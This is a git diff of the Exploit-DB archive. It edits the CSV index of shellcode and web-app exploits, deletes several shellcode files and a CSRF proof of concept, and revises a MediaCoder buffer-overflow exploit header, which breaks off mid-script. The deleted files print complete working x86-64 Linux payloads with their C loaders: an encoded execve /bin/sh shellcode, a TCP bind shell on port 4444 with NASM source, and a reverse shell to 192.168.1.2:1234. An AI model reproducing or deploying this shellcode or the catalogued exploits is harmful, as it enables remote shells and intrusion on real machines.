40122,platforms/lin_x86-64/shellcode/40122.txt,"Linux/x86-64 - Bind TCP Shell (4442/TCP) / Syscall Persistent / Multi-Terminal (4444-4447/TCP) / Password (la crips) / Daemon Shellcode (83/148/177 bytes)",2016-07-19,Kyzer,lin_x86-64,shellcode,0 @@ -16370,7 +16366,7 @@ id,file,description,date,author,platform,type,port 40560,platforms/win_x86/shellcode/40560.asm,"Windows x86 - Reverse UDP Keylogger (www.example.com:4444/UDP) Shellcode (493 bytes)",2016-10-17,Fugu,win_x86,shellcode,0 40781,platforms/win_x86-64/shellcode/40781.c,"Windows x64 - Reverse TCP Shell (192.168.232.129:4444/TCP) + Injection Shellcode (694 bytes)",2016-11-18,"Roziul Hasan Khan Shifat",win_x86-64,shellcode,0 40808,platforms/lin_x86-64/shellcode/40808.c,"Linux/x86-64 - execve /bin/sh -c reboot Shellcode (89 bytes)",2016-11-22,"Ashiyane Digital Security Team",lin_x86-64,shellcode,0 -40821,platforms/win_x86-64/shellcode/40821.c,"Windows x64 - Download File (http://192.168.10.129/pl.exe) + Execute (C:\Users\Public\p.exe) Shellcode (358 bytes)",2016-11-23,"Roziul Hasan Khan Shifat",win_x86-64,shellcode,0 +40821,platforms/win_x86-64/shellcode/40821.c,"Windows x64 - Download File (http://192.168.10.129/pl.exe) + Execute (C:/Users/Public/p.exe) Shellcode (358 bytes)",2016-11-23,"Roziul Hasan Khan Shifat",win_x86-64,shellcode,0 40872,platforms/lin_x86/shellcode/40872.c,"Linux/x86 - Reverse Netcat + mkfifo (-e option disabled) Shell (localhost:9999) Shellcode (180 bytes)",2016-12-05,"Filippo Bersani",lin_x86,shellcode,0 40924,platforms/lin_x86/shellcode/40924.c,"Linux/x86 - execve /bin/bash -c Arbitrary Command Execution Null-Free Shellcode (72 bytes)",2016-12-16,"Filippo Bersani",lin_x86,shellcode,0 40981,platforms/win_x86-64/shellcode/40981.c,"Windows x64 - Bind TCP Password (h271508F) Shell (2493/TCP) Shellcode (825 bytes)",2017-01-01,"Roziul Hasan Khan Shifat",win_x86-64,shellcode,0 @@ -16382,7 +16378,7 @@ id,file,description,date,author,platform,type,port 41220,platforms/generator/shellcode/41220.c,"Linux - Reverse TCP Multi/Dual Mode Shell Shellcode (129 bytes) (Generator)",2017-02-02,odzhancode,generator,shellcode,0 41282,platforms/lin_x86/shellcode/41282.nasm,"Linux/x86 - Reverse TCP /bin/sh Alphanumeric Staged Shell (127.0.0.1:4444/TCP) Shellcode (103 bytes)",2017-02-08,"Snir Levi",lin_x86,shellcode,0 41375,platforms/linux/shellcode/41375.c,"Linux - Bind TCP Dual/Multi Mode Shell Shellcode (156 bytes)",2017-02-16,odzhancode,linux,shellcode,0 -41381,platforms/win_x86/shellcode/41381.c,"Windows x86 - Protect Process Shellcode (229 bytes)",2017-02-17,"Ege Balci",win_x86,shellcode,0 +41381,platforms/win_x86/shellcode/41381.c,"Windows x86 - SE_DACL_PROTECTED Protect Process Shellcode (229 bytes)",2017-02-17,"Ege Balci",win_x86,shellcode,0 41398,platforms/lin_x86-64/shellcode/41398.nasm,"Linux/x86-64 - Reverse TCP /bin/sh Shell (127.0.0.1:4444/TCP) Shellcode (65 bytes)",2017-02-19,"Robert L. Taylor",lin_x86-64,shellcode,0 41403,platforms/lin_x86/shellcode/41403.c,"Linux/x86 - SELinux Permissive Mode Switcher Shellcode (45 bytes)",2017-02-20,lu0xheap,lin_x86,shellcode,0 41439,platforms/lin_x86-64/shellcode/41439.c,"Linux/x86-64 - Egghunter Shellcode (38 bytes)",2017-02-23,odzhancode,lin_x86-64,shellcode,0 @@ -16390,27 +16386,27 @@ id,file,description,date,author,platform,type,port 41468,platforms/lin_x86-64/shellcode/41468.nasm,"Linux/x86-64 - Bind TCP /bin/sh Shell (Random TCP Port) Shellcode (54 bytes)",2017-02-26,"Robert L. Taylor",lin_x86-64,shellcode,0 41477,platforms/lin_x86-64/shellcode/41477.c,"Linux/x86-64 - Reverse TCP Shell (192.168.1.45:4444/TCP) Shellcode (84 bytes)",2017-02-28,"Manuel Mancera",lin_x86-64,shellcode,0 41481,platforms/win_x86/shellcode/41481.asm,"Windows x86 - Reverse TCP Staged Alphanumeric Shell (127.0.0.1:4444/TCP) Shellcode (332 Bytes)",2017-03-01,"Snir Levi",win_x86,shellcode,0 -41498,platforms/lin_x86-64/shellcode/41498.nasm,"Linux/x86-64 - setuid(0) + Execve(/bin/sh) Polymorphic Shellcode (31 bytes)",2017-03-03,"Robert L. Taylor",lin_x86-64,shellcode,0 +41498,platforms/lin_x86-64/shellcode/41498.nasm,"Linux/x86-64 - setuid(0) + execve(/bin/sh) Polymorphic Shellcode (31 bytes)",2017-03-03,"Robert L. Taylor",lin_x86-64,shellcode,0 41503,platforms/lin_x86-64/shellcode/41503.nasm,"Linux/x86-64 - Flush IPTables Rules (/sbin/iptables -F) Polymorphic Shellcode (47 bytes)",2017-03-03,"Robert L. Taylor",lin_x86-64,shellcode,0 41509,platforms/lin_x86-64/shellcode/41509.nasm,"Linux/x86-64 - Reverse Netcat Shell (127.0.0.1:1337) Shellcode (72 bytes)",2017-03-04,"Robert L. Taylor",lin_x86-64,shellcode,0 41510,platforms/lin_x86-64/shellcode/41510.nsam,"Linux/x86-64 - Reverse Netcat Shell (127.0.0.1:1234) Polymorphic Shellcode (106 bytes)",2017-03-04,"Robert L. Taylor",lin_x86-64,shellcode,0 41581,platforms/win_x86/shellcode/41581.c,"Windows x86 - Hide Console Window Shellcode (182 bytes)",2017-03-11,"Ege Balci",win_x86,shellcode,0 -41630,platforms/lin_x86/shellcode/41630.asm,"Linux/x86 - exceve(_/bin/sh_) Encoded Shellcode (44 Bytes)",2017-03-17,WangYihang,lin_x86,shellcode,0 +41630,platforms/lin_x86/shellcode/41630.asm,"Linux/x86 - exceve /bin/sh Encoded Shellcode (44 Bytes)",2017-03-17,WangYihang,lin_x86,shellcode,0 41631,platforms/lin_x86/shellcode/41631.c,"Linux/x86 - Bind TCP /bin/sh Shell (Random TCP Port) Shellcode (44 bytes)",2017-03-17,"Oleg Boytsev",lin_x86,shellcode,0 41635,platforms/lin_x86/shellcode/41635.txt,"Linux/x86 - Read /etc/passwd Shellcode (54 Bytes)",2017-03-19,WangYihang,lin_x86,shellcode,0 42295,platforms/lin_x86/shellcode/42295.c,"Linux/x86 - Reverse TCP Shell (127.1.1.1:11111/TCP) Null-Free Shellcode (67 bytes)",2013-01-01,"Geyslan G. Bem",lin_x86,shellcode,0 -41723,platforms/lin_x86/shellcode/41723.c,"Linux/x86 - Reverse TCP /bin/bash Shell (192.168.3.119:54321) Shellcode (110 bytes)",2017-03-24,JR0ch17,lin_x86,shellcode,0 -41750,platforms/lin_x86-64/shellcode/41750.txt,"Linux/x86-64 - execve(_/bin/sh_) Shellcode (21 Bytes)",2017-03-28,WangYihang,lin_x86-64,shellcode,0 -41757,platforms/lin_x86/shellcode/41757.txt,"Linux/x86 - execve(_/bin/sh_) Shellcode (21 bytes)",2017-03-29,WangYihang,lin_x86,shellcode,0 +41723,platforms/lin_x86/shellcode/41723.c,"Linux/x86 - Reverse TCP /bin/bash Shell (192.168.3.119:54321/TCP) Shellcode (110 bytes)",2017-03-24,JR0ch17,lin_x86,shellcode,0 +41750,platforms/lin_x86-64/shellcode/41750.txt,"Linux/x86-64 - execve /bin/sh Shellcode (21 Bytes)",2017-03-28,WangYihang,lin_x86-64,shellcode,0 +41757,platforms/lin_x86/shellcode/41757.txt,"Linux/x86 - execve /bin/sh Shellcode (21 bytes)",2017-03-29,WangYihang,lin_x86,shellcode,0 41827,platforms/win_x86-64/shellcode/41827.txt,"Windows 10 x64 - Egghunter Shellcode (45 bytes)",2017-04-06,"Peter Baris",win_x86-64,shellcode,0 -41883,platforms/lin_x86-64/shellcode/41883.txt,"Linux/x86-64 - execve(_/bin/sh_) Shellcode (31 bytes)",2017-04-13,WangYihang,lin_x86-64,shellcode,0 +41883,platforms/lin_x86-64/shellcode/41883.txt,"Linux/x86-64 - execve /bin/sh Shellcode (31 bytes)",2017-04-13,WangYihang,lin_x86-64,shellcode,0 41909,platforms/lin_x86/shellcode/41909.c,"Linux/x86 - Egghunter Shellcode (18 bytes)",2017-04-22,phackt_ul,lin_x86,shellcode,0 41969,platforms/lin_x86/shellcode/41969.c,"Linux/x86 - Disable ASLR Security Shellcode (80 bytes)",2017-05-08,abatchy17,lin_x86,shellcode,0 41970,platforms/lin_x86-64/shellcode/41970.asm,"Linux/x86-64 - Reverse TCP Shell (::1:1472/TCP) (IPv6) Null-Free Shellcode (113 bytes)",2017-05-08,Srakai,lin_x86-64,shellcode,0 42016,platforms/windows/shellcode/42016.asm,"Windows x86/x64 - cmd.exe Shellcode (718 bytes)",2017-05-17,"Filippo Bersani",windows,shellcode,0 42126,platforms/lin_x86-64/shellcode/42126.c,"Linux/x86-64 - execve /bin/sh Shellcode (31 bytes)",2017-06-05,"Touhid M.Shaikh",lin_x86-64,shellcode,0 -42177,platforms/lin_x86/shellcode/42177.c,"Linux/x86 - execve(/bin/sh) + setuid(0) + setgid(0) XOR Encoded Shellcode (66 bytes)",2017-06-15,nullparasite,lin_x86,shellcode,0 -42179,platforms/lin_x86-64/shellcode/42179.c,"Linux/x86-64 - execve(_/bin/sh_) Shellcode (24 bytes)",2017-06-15,m4n3dw0lf,lin_x86-64,shellcode,0 +42177,platforms/lin_x86/shellcode/42177.c,"Linux/x86 - execve /bin/sh + setuid(0) + setgid(0) XOR Encoded Shellcode (66 bytes)",2017-06-15,nullparasite,lin_x86,shellcode,0 +42179,platforms/lin_x86-64/shellcode/42179.c,"Linux/x86-64 - execve /bin/sh Shellcode (24 bytes)",2017-06-15,m4n3dw0lf,lin_x86-64,shellcode,0 42208,platforms/lin_x86/shellcode/42208.nasm,"Linux/x86 - Reverse UDP /bin/sh Shell (127.0.0.1:53/UDP) Shellcode (668 bytes)",2017-06-20,"DONTON Fetenat C",lin_x86,shellcode,0 42254,platforms/lin_x86/shellcode/42254.c,"Linux/x86 - Bind TCP /bin/sh Shell (4444/TCP) Null-Free Shellcode (75 bytes)",2017-06-26,wetw0rk,lin_x86,shellcode,0 42339,platforms/lin_x86-64/shellcode/42339.c,"Linux/x86-64 - Reverse TCP Shell (192.168.1.8:4444/TCP) Shellcode (104 bytes)",2017-07-19,m4n3dw0lf,lin_x86-64,shellcode,0 @@ -20243,7 +20239,7 @@ id,file,description,date,author,platform,type,port 6677,platforms/php/webapps/6677.pl,"geccBBlite 2.0 - 'id' Parameter SQL Injection",2008-10-05,Piker,php,webapps,0 6678,platforms/php/webapps/6678.txt,"Fastpublish CMS 1.9999 - Local File Inclusion / SQL Injection",2008-10-05,~!Dok_tOR!~,php,webapps,0 6679,platforms/php/webapps/6679.txt,"phpAbook 0.8.8b - 'cookie' Local File Inclusion",2008-10-05,JosS,php,webapps,0 -6680,platforms/php/webapps/6680.txt,"FOSS Gallery Public 1.0 - Arbitrary File Upload",2008-10-05,Pepelux,php,webapps,0 +6680,platforms/php/webapps/6680.txt,"FOSS Gallery Public 1.0 - Arbitrary File Upload (PoC)",2008-10-05,Pepelux,php,webapps,0 6681,platforms/php/webapps/6681.txt,"PHP-Fusion Mod manuals - 'manual' Parameter SQL Injection",2008-10-05,boom3rang,php,webapps,0 6682,platforms/php/webapps/6682.txt,"PHP-Fusion Mod raidtracker_panel - 'INFO_RAID_ID' Parameter SQL Injection",2008-10-05,boom3rang,php,webapps,0 6683,platforms/php/webapps/6683.txt,"PHP-Fusion Mod recept - 'kat_id' Parameter SQL Injection",2008-10-05,boom3rang,php,webapps,0 @@ -25871,7 +25867,7 @@ id,file,description,date,author,platform,type,port 18513,platforms/php/webapps/18513.txt,"DFLabs PTK 1.0.5 - Steal Authentication Credentials",2012-02-22,"Ivano Binetti",php,webapps,0 18509,platforms/hardware/webapps/18509.html,"D-Link DCS Series - Cross-Site Request Forgery (Change Admin Password)",2012-02-22,rigan,hardware,webapps,0 18510,platforms/windows/webapps/18510.txt,"WebcamXP and webcam 7 - Directory Traversal",2012-02-22,Silent_Dream,windows,webapps,0 -18511,platforms/hardware/webapps/18511.txt,"D-Link DSL-2640B - Authentication Bypass",2012-02-22,"Ivano Binetti",hardware,webapps,0 +18511,platforms/hardware/webapps/18511.txt,"D-Link DSL-2640B ADSL Router - Authentication Bypass",2012-02-22,"Ivano Binetti",hardware,webapps,0 18516,platforms/php/webapps/18516.txt,"phpDenora 1.4.6 - Multiple SQL Injections",2012-02-23,NLSecurity,php,webapps,0 18517,platforms/hardware/webapps/18517.txt,"Snom IP Phone - Privilege Escalation",2012-02-23,"Sense of Security",hardware,webapps,0 18519,platforms/php/webapps/18519.txt,"PHP Gift Registry 1.5.5 - SQL Injection",2012-02-24,G13,php,webapps,0 @@ -35117,7 +35113,7 @@ id,file,description,date,author,platform,type,port 36099,platforms/php/webapps/36099.html,"GuppY CMS 5.0.9 < 5.00.10 - Multiple Cross-Site Request Forgery Vulnerabilities",2015-02-17,"Brandon Murphy",php,webapps,80 36102,platforms/php/webapps/36102.txt,"Mambo Component N-Gallery - SQL Injection",2011-09-02,CoBRa_21,php,webapps,0 36103,platforms/php/webapps/36103.txt,"Mambo Component Ahsshop - SQL Injection",2011-09-02,CoBRa_21,php,webapps,0 -36105,platforms/hardware/webapps/36105.sh,"D-Link DSL-2640B - Unauthenticated Remote DNS Change",2015-02-18,"Todor Donev",hardware,webapps,0 +36105,platforms/hardware/webapps/36105.sh,"D-Link DSL-2640B ADSL Router - 'ddnsmngr' Unauthenticated Remote DNS Change",2015-02-18,"Todor Donev",hardware,webapps,0 36106,platforms/php/webapps/36106.txt,"Mambo Component N-Press - SQL Injection",2011-09-02,CoBRa_21,php,webapps,0 36107,platforms/php/webapps/36107.txt,"KaiBB 2.0.1 - SQL Injection / Arbitrary File Upload",2011-09-02,KedAns-Dz,php,webapps,0 36108,platforms/php/webapps/36108.txt,"Mambo Component N-Frettir - SQL Injection",2011-09-02,CoBRa_21,php,webapps,0 @@ -37331,7 +37327,6 @@ id,file,description,date,author,platform,type,port 40163,platforms/php/webapps/40163.txt,"PHP File Vault 0.9 - Directory Traversal",2016-07-26,N_A,php,webapps,80 40165,platforms/cgi/webapps/40165.txt,"Iris ID IrisAccess ICU 7000-2 - Multiple Vulnerabilities",2016-07-26,LiquidWorm,cgi,webapps,80 40166,platforms/cgi/webapps/40166.txt,"Iris ID IrisAccess ICU 7000-2 - Remote Command Execution",2016-07-26,LiquidWorm,cgi,webapps,80 -40168,platforms/php/webapps/40168.txt,"Open Upload 0.4.2 - Multiple Cross-Site Request Forgery Vulnerabilities",2016-07-27,"Vinesh Redkar",php,webapps,80 40174,platforms/php/webapps/40174.txt,"WordPress Plugin Ultimate Product Catalog 3.9.8 - (do_shortcode via ajax) Blind SQL Injection",2016-07-29,"i0akiN SEC-LABORATORY",php,webapps,80 40180,platforms/linux/webapps/40180.txt,"Trend Micro Deep Discovery 3.7/3.8 SP1 (3.81)/3.8 SP2 (3.82) - 'hotfix_upload.cgi' Filename Remote Code Execution",2016-07-29,korpritzombie,linux,webapps,443 40185,platforms/php/webapps/40185.py,"phpMyAdmin 4.6.2 - Authenticated Remote Code Execution",2016-07-29,@iamsecurity,php,webapps,80 @@ -38215,7 +38210,7 @@ id,file,description,date,author,platform,type,port 42194,platforms/hardware/webapps/42194.sh,"UTstarcom WA3002G4 - Unauthenticated DNS Change",2017-06-17,"Todor Donev",hardware,webapps,0 42195,platforms/hardware/webapps/42195.sh,"D-Link DSL-2640U - Unauthenticated DNS Change",2017-06-17,"Todor Donev",hardware,webapps,0 42196,platforms/hardware/webapps/42196.sh,"Beetel BCM96338 Router - Unauthenticated DNS Change",2017-06-17,"Todor Donev",hardware,webapps,0 -42197,platforms/hardware/webapps/42197.sh,"D-Link DSL-2640B - Unauthenticated Remote DNS Change",2017-06-18,"Todor Donev",hardware,webapps,0 +42197,platforms/hardware/webapps/42197.sh,"D-Link DSL-2640B ADSL Router - 'dnscfg' Unauthenticated Remote DNS Change",2017-06-18,"Todor Donev",hardware,webapps,0 42205,platforms/php/webapps/42205.html,"WonderCMS 2.1.0 - Cross-Site Request Forgery",2017-06-19,"Ehsan Hosseini",php,webapps,0 42221,platforms/php/webapps/42221.py,"PHPMailer < 5.2.20 with Exim MTA - Remote Code Execution",2017-06-21,phackt_ul,php,webapps,0 42252,platforms/hardware/webapps/42252.txt,"Eltek SmartPack - Backdoor Account",2017-06-26,"Saeed reza Zamanian",hardware,webapps,0 diff --git a/platforms/lin_x86-64/shellcode/37427.txt b/platforms/lin_x86-64/shellcode/37427.txt deleted file mode 100755 index faac24a4b..000000000 --- a/platforms/lin_x86-64/shellcode/37427.txt +++ /dev/null @@ -1,38 +0,0 @@ -/* -Compile with: gcc -fno-stack-protector -z execstack -This execve shellcode is encoded with 0xff and is for 64 bit linux. - -shell: file format elf64-x86-64 - - -Disassembly of section .text: - -0000000000400080 : - 400080: 48 b9 ff ff ff ff ff movabs rcx,0xffffffffffffffff - 400087: ff ff ff=20 - 40008a: 49 b8 ae b7 72 c3 db movabs r8,0xfffaf0dbc372b7ae - 400091: f0 fa ff=20 - 400094: 49 31 c8 xor r8,rcx - 400097: 41 50 push r8 - 400099: 49 b8 d0 9d 96 91 d0 movabs r8,0x978cd0d091969dd0 - 4000a0: d0 8c 97=20 - 4000a3: 49 31 c8 xor r8,rcx - 4000a6: 41 50 push r8 - 4000a8: 49 b8 b7 ce 2d ad 4f movabs r8,0x46b7c44fad2dceb7 - 4000af: c4 b7 46=20 - 4000b2: 49 31 c8 xor r8,rcx - 4000b5: 41 50 push r8 - 4000b7: ff e4 jmp rsp - -2015 William Borskey - -*/ -char shellcode[] = "\x48\xb9\xff\xff\xff\xff\xff\xff\xff\xff\x49\xb8\xae\xb7\x72\xc3\xdb\xf0\xfa\xff\x49\x31\xc8\x41\x50\x49\xb8\xd0\x9d\x96\x91\xd0\xd0\x8c\x97\x49\x31\xc8\x41\x50\x49\xb8\xb7\xce\x2d\xad\x4f\xc4\xb7\x46\x49\x31\xc8\x41\x50\xff\xe4"; - -int main(int argc, char **argv) -{ - int (*func)(); - func = (int (*)()) shellcode; - (int)(*func)(); - return 0; -} \ No newline at end of file diff --git a/platforms/lin_x86-64/shellcode/39151.c b/platforms/lin_x86-64/shellcode/39151.c deleted file mode 100755 index 35063763c..000000000 --- a/platforms/lin_x86-64/shellcode/39151.c +++ /dev/null @@ -1,163 +0,0 @@ -/*--------------------------------------------------------------------------------------------------------------------- - * /* -* # Exploit Title: bindshell TCP -* Author: Scorpion -* Copyright: (c) 2016 iQube. (http://iQube.io) -* Release Date: January 1, 2016 -* Contact: https://www.facebook.com/sathish.royalmechanical -* Description: x64 Linux null-free TCP bind port shellcode -* Architecture: linux x86_64 -* Assembled Size: 103 bytes -* category: Shellcode -* Tested On: Ubuntu 14.04 LTS -* SLAE64-1408 -* Build/Run: gcc -fno-stack-protector -z execstack bindshell.c -o bindshell -* ./bindshell -* nc localhost 4444 -* -*/ - -/* -* NOTE: This C code binds on port 4444 -* The end of this file contains the .nasm source code -* The Port can be Reconfigured According to your needs -* Instructions for changing port number -* Port obtainer change the port value accorddingly -* port.py -* import socket -* port = 444 -* hex(socket.htons(port)) -* python port.py -* Result : 0x5c11 -* Replace the obtained value in the shellcode to change the port number -* For building the from .nasm source use -* nasm -felf64 filename.nasm -o filename.o -* ld filename.o -o filename -* To inspect for nulls -* objdump -M intel -D filename.o - - -global _start - -_start: - - ; sock = socket(AF_INET, SOCK_STREAM, 0) - ; AF_INET = 2 - ; SOCK_STREAM = 1 - ; syscall number 41 - - xor rax, rax ;Xor function will null the values in the register beacuse we doesn't know whats the value in the register in realtime cases - xor rsi, rsi - mul rsi - push byte 0x2 ;pusing argument to the stack - pop rdi ; poping the argument to the rdi instructions on the top of the stack should be remove first because stack LIFO - inc esi ; already rsi is 0 so incrementing the rsi register will make it 1 - push byte 0x29 ; pushing the syscall number into the rax by using stack - pop rax - syscall - - ; copying the socket descripter from rax to rdi register so that we can use it further - - xchg rax, rdi - - ; server.sin_family = AF_INET - ; server.sin_port = htons(PORT) - ; server.sin_addr.s_addr = INADDR_ANY - ; bzero(&server.sin_zero, 8) - ; setting up the data sctructure - - push 0x2 ;AF_INET value is 2 so we are pushing 0x2 - mov word [rsp + 2],0x5c11 ;port 4444 htons hex value is 0x5c11 port values can be be obtained by following above instructions - push rsp ; saving the complete argument to rsi register - pop rsi - - - ; bind(sock, (struct sockaddr *)&server, sockaddr_len) - ; syscall number 49 - - push rdx ; Inserting the null to the stack - push byte 0x10 - pop rdx ; value of the rdx register is set to 16 size sockaddr - push byte 0x31 - pop rax ; rax register is set with 49 syscall for bind - syscall - - ;listen the sockets for the incomming connections - ; listen(sock, MAX_CLIENTS) - ; syscall number 50 - - pop rsi - push 0x32 - pop rax ; rax register is set to 50 syscall for listen - syscall - - ; new = accept(sock, (struct sockaddr *)&client, &sockaddr_len) - ;syscall number 43 - - push 0x2b - pop rax ; rax register is set to 43 syscall for accept - syscall - - ; storing the client socket description - mov r9, rax - - ; close parent - push 0x3 - pop rax ; closing the parent socket connection using close parent rax is set to 3 syscall to close parent - syscall - - xchg rdi , r9 - xor rsi , rsi - - ; initilization of dup2 - push 0x3 - pop rsi ; setting argument to 3 - - - -duplicate: - dec esi - mov al, 0x21 ;duplicate syscall applied to error,output and input using loop - syscall - jne duplicate - - -execve: ; Execve format , execve("/bin/sh", 0 , 0) - xor rsi , rsi - mul rsi ; zeroed rax , rdx register - push ax ; terminate string with null - mov rbx , 0x68732f2f6e69622f ; "/bin//sh" in reverse order - push rbx - push rsp - pop rdi ; set RDI - push byte 0x3b ; execve syscall number (59) - pop rax - syscall - - -*/------------------------------------------------------------------------------------------------------------------ - - -#include -#include - -unsigned char code[] = \ -"\x48\x31\xc0\x48\x31\xf6\x48\xf7\xe6\x6a\x02\x5f\xff\xc6\x6a\x29\x58\x0f\x05\x48\x97\x6a\x02\x66\xc7\x44\x24\x02" -//Port number this value can be obtained from the above instructions -"\x11\x5c" -"\x54\x5e\x52\x6a\x10\x5a\x6a\x31\x58\x0f\x05\x5e\x6a\x32\x58\x0f\x05\x6a\x2b\x58\x0f\x05\x49\x89\xc1\x6a\x03\x58\x0f\x05\x49\x87\xf9\x48\x31\xf6\x6a\x03\x5e\xff\xce\xb0\x21\x0f\x05\x75\xf8\x48\x31\xf6\x48\xf7\xe6\x66\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f\x6a\x3b\x58\x0f\x05"; - - - -main() -{ - - printf("Shellcode Length: %d\n", (int)strlen(code)); - - int (*ret)() = (int(*)())code; - - ret(); - -} - - \ No newline at end of file diff --git a/platforms/lin_x86-64/shellcode/39844.c b/platforms/lin_x86-64/shellcode/39844.c deleted file mode 100755 index b1b6609b4..000000000 --- a/platforms/lin_x86-64/shellcode/39844.c +++ /dev/null @@ -1,83 +0,0 @@ -/* -# Exploit Title: Shellcode [Linux x86_64 Reverse Shell] -# Date: 19/03/2016 -# Shellcode Author: Sudhanshu Chauhan -# LinkedIn: https://in.linkedin.com/in/sudhanshuchauhan -# Tested on: [Ubuntu 14.04.1 x86_64] - -global _start - - -_start: - - ;Socket - xor rax, rax - xor rdi, rdi - xor rsi, rsi - xor rdx, rdx - add rax, 41 - add rdi, 2 - add rsi, 1 - syscall - - ; copy socket descriptor - mov rdi, rax - - ; Socket details IP- 192.168.1.2 Port- 1234 - xor rax, rax - push rax - mov dword [rsp-4], 0x0201a8c0 - mov word [rsp-6], 0xd204 - sub rsp, 6 - push word 0x2 - - - ;connect - xor rax, rax - xor rdx, rdx - add rax, 42 - mov rsi, rsp - add rdx, 16 - syscall - - - ;duplicate sockets - xor rax, rax - add rax, 33 - xor rsi, rsi - syscall - - mov al, 33 - add rsi, 1 - syscall - - mov al, 33 - add rsi, 1 - syscall - - ; execve - xor rax, rax - push rax - mov rbx, 0x68732f2f6e69622f - push rbx - mov rdi, rsp - push rax - mov rdx, rsp - push rdi - mov rsi, rsp - add rax, 59 - syscall - -*/ - -#include -#include -unsigned char code[] = \ -"\x48\x31\xc0\x48\x31\xff\x48\x31\xf6\x48\x31\xd2\x48\x83\xc0\x29\x48\x83\xc7\x02\x48\x83\xc6\x01\x0f\x05\x48\x89\xc7\x48\x31\xc0\x50\xc7\x44\x24\xfc\xc0\xa8\x01\x02\x66\xc7\x44\x24\xfa\x04\xd2\x48\x83\xec\x06\x66\x6a\x02\x48\x31\xc0\x48\x31\xd2\x48\x83\xc0\x2a\x48\x89\xe6\x48\x83\xc2\x10\x0f\x05\x48\x31\xc0\x48\x83\xc0\x21\x48\x31\xf6\x0f\x05\xb0\x21\x48\x83\xc6\x01\x0f\x05\xb0\x21\x48\x83\xc6\x01\x0f\x05\x48\x31\xc0\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x89\xe7\x50\x48\x89\xe2\x57\x48\x89\xe6\x48\x83\xc0\x3b\x0f\x05"; - -main() -{ - printf("Shellcode Length: %d\n", (int)sizeof(code)-1); - int (*ret)() = (int(*)())code; - ret(); -} \ No newline at end of file diff --git a/platforms/php/webapps/40168.txt b/platforms/php/webapps/40168.txt deleted file mode 100755 index 3db9accb4..000000000 --- a/platforms/php/webapps/40168.txt +++ /dev/null @@ -1,65 +0,0 @@ -================================================================================================================ -Open Upload 0.4.2 Remote Admin Add CSRF Exploit and Changing Normal user permission -================================================================================================================ -# Exploit Title : Open Upload 0.4.2 Remote Admin Add CSRF Exploit -# Exploit Author : Vinesh Redkar (@b0rn2pwn) -# Email : vineshredkar89[at]gmail[d0t]com -# Date: 21/07/2016 -# Vendor Homepage: http://openupload.sourceforge.net/ -# Software Link: https://sourceforge.net/projects/openupload/ -# Version: 0.4.2 -# Tested on: Windows 10 OS - -Open Upload Application is vulnerable to CSRF attack (No CSRF token in place) meaning -that if an admin user can be tricked to visit a crafted URL created by -attacker (via spear phishing/social engineering). - -Once exploited, the attacker can login as the admin using the username and the password he posted in the form. - -======================CSRF POC (Adding New user with Admin Privileges)================================== -CSRF PoC Code - - -Remote Admin Add CSRF Exploit - -

Remote Admin Add CSRF Exploit by b0rn2pwn

- -
- - - - - - - - - - - -
- - - -======================CSRF POC (Changing privileges from normal user to administer)================================== - - - -Change privilege normal user to administer CSRF Exploit - -

Change privilege normal user to administer CSRF Exploit by b0rn2pwn

- -
- - - - - - - - - - - -
- - \ No newline at end of file diff --git a/platforms/windows/local/41971.py b/platforms/windows/local/41971.py index e0d5e949d..e7e50586f 100755 --- a/platforms/windows/local/41971.py +++ b/platforms/windows/local/41971.py @@ -1,21 +1,30 @@ #!/usr/bin/python -# Exploit Title : MediaCoder 0.8.48.5888 Local Buffer Overflow (SEH) -# Date : 2017-05-08 -# Exploit Author : Muhann4d -# Vendor Homepage : http://www.mediacoderhq.com -# Software Link : http://www.mediacoderhq.com/mirrors.html?file=MediaCoder-0.8.48.5888.exe -# Tested Version : 0.8.48.5888 -# Category : Local Buffer Overflow -# Tested on OS : Windows 7 Professional SP1 32bit +# Exploit Title : MediaCoder 0.8.48.5888 Local Buffer Overflow (SEH) +# CVE : CVE-2017-8869 +# Exploit Author : Muhann4d @0xSecured +# Vendor Homepage : http://www.mediacoderhq.com +# Vulnerable Software: http://www.mediacoderhq.com/mirrors.html?file=MediaCoder-0.8.48.5888.exe +# Vulnerable Version : 0.8.48.5888 +# Fixed version : 0.8.49.5890 http://www.mediacoderhq.com/mirrors.html?file=MediaCoder-0.8.49.5890.exe +# Category : Local Buffer Overflow +# Tested on OS : Windows 7 Pro SP1 32bit +# How to : Open MediaCoder then drag & drop the .m3u file in it and then press the START button. +# or just write click on the .mu3 file .. open with .. MediaCoder +# Timeline : +# 2017-05-05: Vulnerability discovered, vendor has been contaced +# 2017-05-08: Vendor replied denying it .."I believe this was an old issue and no longer exists in the latest version" +# 2017-05-09: A POC sent to the vendor. +# 2017-05-11: New version is released. According to http://blog.mediacoderhq.com/changelog/ +# 2017-06-26: Exploit released. - -print "MediaCoder 0.8.48.5888 Local Exploit By Muhann4d" +print "MediaCoder 0.8.48.5888 Local Exploit By Muhann4d @0xSecured" from struct import pack junk = "http://" + "\x41" * 361 nseh = pack('